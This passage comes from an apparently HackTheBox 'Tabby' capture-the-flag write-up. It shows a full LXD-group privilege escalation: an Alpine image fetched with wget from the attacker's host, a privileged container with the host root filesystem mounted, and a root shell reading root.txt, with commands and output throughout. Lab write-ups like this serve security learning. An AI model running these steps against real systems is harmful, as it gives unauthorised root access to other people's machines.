<span class="nb">users</span> &amp; <span class="nb">groups </span><span class="nv">uid</span><span class="o">=</span>0<span class="o">(</span>root<span class="o">)</span> <span class="nv">gid</span><span class="o">=</span>0<span class="o">(</span>root<span class="o">)</span> <span class="nb">groups</span><span class="o">=</span>0<span class="o">(</span>root<span class="o">)</span> <span class="nv">uid</span><span class="o">=</span>1000<span class="o">(</span>ash<span class="o">)</span> <span class="nv">gid</span><span class="o">=</span>1000<span class="o">(</span>ash<span class="o">)</span> <span class="nb">groups</span><span class="o">=</span>1000<span class="o">(</span>ash<span class="o">)</span>,4<span class="o">(</span>adm<span class="o">)</span>,24<span class="o">(</span>cdrom<span class="o">)</span>,30<span class="o">(</span>dip<span class="o">)</span>,46<span class="o">(</span>plugdev<span class="o">)</span>,116<span class="o">(</span>lxd<span class="o">)</span> <span class="nv">uid</span><span class="o">=</span>100<span class="o">(</span>systemd-network<span class="o">)</span> <span class="nv">gid</span><span class="o">=</span>102<span class="o">(</span>systemd-network<span class="o">)</span> <span class="nb">groups</span><span class="o">=</span>102<span class="o">(</span>systemd-network<span class="o">)</span> <span class="nv">uid</span><span class="o">=</span>101<span class="o">(</span>systemd-resolve<span class="o">)</span> <span class="nv">gid</span><span class="o">=</span>103<span class="o">(</span>systemd-resolve<span class="o">)</span> <span class="nb">groups</span><span class="o">=</span>103<span class="o">(</span>systemd-resolve<span class="o">)</span> <span class="nv">uid</span><span class="o">=</span>102<span class="o">(</span>systemd-timesync<span class="o">)</span> <span class="nv">gid</span><span class="o">=</span>104<span class="o">(</span>systemd-timesync<span class="o">)</span> <span class="nb">groups</span><span class="o">=</span>104<span class="o">(</span>systemd-timesync<span class="o">)</span> ... </code></pre> </div> <p>A member of the group escalate to root easily because LXD is a root process that carries out action on behalf of the user. You can find a much detailed explanation here. </p> <h1> Root Exploit </h1> <p>The gist of what needs to get done is as follows :</p> <ul> <li>Download and build the latest alpine container from github. You will need to do this on your local system. </li> </ul> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>git clone https://github.com/saghul/lxd-alpine-builder.git <span class="nb">cd </span>lxd-alpine-builder ./build-alpine </code></pre> </div> <ul> <li>When the build completes, transfer the tar file generated to the victim machine (assuming you are running a webserver at port 8000) </li> </ul> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>ash@tabby:~<span class="nv">$ </span>wget http://10.10.14.14:8000/lxd-alpine-builder/alpine-v3.12-x86_64-20200823_2337.tar.gz <span class="nt">--2020-11-05</span> 07:11:27-- http://10.10.14.14:8000/lxd-alpine-builder/alpine-v3.12-x86_64-20200823_2337.tar.gz Connecting to 10.10.14.14:8000... connected. HTTP request sent, awaiting response... 200 OK Length: 3183908 <span class="o">(</span>3.0M<span class="o">)</span> <span class="o">[</span>application/gzip] Saving to: <span class="s1">'alpine-v3.12-x86_64-20200823_2337.tar.gz'</span> alpine-v3.12-x86_64 100%[<span class="o">===================&gt;]</span> 3.04M 1.57MB/s <span class="k">in </span>1.9s 2020-11-05 07:11:29 <span class="o">(</span>1.57 MB/s<span class="o">)</span> - <span class="s1">'alpine-v3.12-x86_64-20200823_2337.tar.gz'</span> saved <span class="o">[</span>3183908/3183908] </code></pre> </div> <ul> <li>Import this image on the victim machine and then initialize lxd and lxc. </li> </ul> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>ash@tabby:~<span class="nv">$ </span>lxc image import ./alpine-v3.12-x86_64-20200823_2337.tar.gz <span class="nt">--alias</span> bas ash@tabby:~<span class="nv">$ </span>lxd init Would you like to use LXD clustering? <span class="o">(</span><span class="nb">yes</span>/no<span class="o">)</span> <span class="o">[</span><span class="nv">default</span><span class="o">=</span>no]: Do you want to configure a new storage pool? <span class="o">(</span><span class="nb">yes</span>/no<span class="o">)</span> <span class="o">[</span><span class="nv">default</span><span class="o">=</span><span class="nb">yes</span><span class="o">]</span>: Name of the new storage pool <span class="o">[</span><span class="nv">default</span><span class="o">=</span>default]: Name of the storage backend to use <span class="o">(</span><span class="nb">dir</span>, lvm, ceph, btrfs<span class="o">)</span> <span class="o">[</span><span class="nv">default</span><span class="o">=</span>btrfs]: Create a new BTRFS pool? <span class="o">(</span><span class="nb">yes</span>/no<span class="o">)</span> <span class="o">[</span><span class="nv">default</span><span class="o">=</span><span class="nb">yes</span><span class="o">]</span>: Would you like to use an existing block device? <span class="o">(</span><span class="nb">yes</span>/no<span class="o">)</span> <span class="o">[</span><span class="nv">default</span><span class="o">=</span>no]: Size <span class="k">in </span>GB of the new loop device <span class="o">(</span>1GB minimum<span class="o">)</span> <span class="o">[</span><span class="nv">default</span><span class="o">=</span>15GB]: Would you like to connect to a MAAS server? <span class="o">(</span><span class="nb">yes</span>/no<span class="o">)</span> <span class="o">[</span><span class="nv">default</span><span class="o">=</span>no]: Would you like to create a new <span class="nb">local </span>network bridge? <span class="o">(</span><span class="nb">yes</span>/no<span class="o">)</span> <span class="o">[</span><span class="nv">default</span><span class="o">=</span><span class="nb">yes</span><span class="o">]</span>: What should the new bridge be called? <span class="o">[</span><span class="nv">default</span><span class="o">=</span>lxdbr0]: What IPv4 address should be used? <span class="o">(</span>CIDR subnet notation, <span class="s2">"auto"</span> or <span class="s2">"none"</span><span class="o">)</span> <span class="o">[</span><span class="nv">default</span><span class="o">=</span>auto]: What IPv6 address should be used? <span class="o">(</span>CIDR subnet notation, <span class="s2">"auto"</span> or <span class="s2">"none"</span><span class="o">)</span> <span class="o">[</span><span class="nv">default</span><span class="o">=</span>auto]: Would you like LXD to be available over the network? <span class="o">(</span><span class="nb">yes</span>/no<span class="o">)</span> <span class="o">[</span><span class="nv">default</span><span class="o">=</span>no]: Would you like stale cached images to be updated automatically? <span class="o">(</span><span class="nb">yes</span>/no<span class="o">)</span> <span class="o">[</span><span class="nv">default</span><span class="o">=</span><span class="nb">yes</span><span class="o">]</span> Would you like a YAML <span class="s2">"lxd init"</span> preseed to be printed? <span class="o">(</span><span class="nb">yes</span>/no<span class="o">)</span> <span class="o">[</span><span class="nv">default</span><span class="o">=</span>no]: ash@tabby:~<span class="nv">$ </span>lxc init bas privs <span class="nt">-c</span> security.privileged<span class="o">=</span><span class="nb">true </span>Creating privs </code></pre> </div> <ul> <li>Mount the root directory inside the container </li> </ul> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>ash@tabby:~<span class="nv">$ </span>lxc config device add privs mydevice disk <span class="nb">source</span><span class="o">=</span>/ <span class="nv">path</span><span class="o">=</span>/mnt/root <span class="nv">recursive</span><span class="o">=</span><span class="nb">true </span>With the whole setup completed, now you can start a shell <span class="k">in </span>the container. From here on you <span class="k">then </span>navigate to the mount point <span class="s2">"/mnt/root"</span><span class="nb">.</span> ash@tabby:~<span class="nv">$ </span>lxc start privs ash@tabby:~<span class="nv">$ </span>lxc <span class="nb">exec </span>privs /bin/sh ~ <span class="c"># id</span> <span class="nv">uid</span><span class="o">=</span>0<span class="o">(</span>root<span class="o">)</span> <span class="nv">gid</span><span class="o">=</span>0<span class="o">(</span>root<span class="o">)</span> ~ <span class="c"># cd /mnt/root</span> /mnt/root <span class="c"># ls</span> bin home lost+found root swap.img boot lib media run sys cdrom lib32 mnt sbin tmp dev lib64 opt snap usr etc libx32 proc srv var /mnt/root <span class="c"># cd root/</span> /mnt/root/root <span class="c"># ls</span> root.txt snap /mnt/root/root <span class="c">#</span> </code></pre> </div> <p>We can now get the root flag from the context of the lxc container.</p> hackthebox linux lxc lxd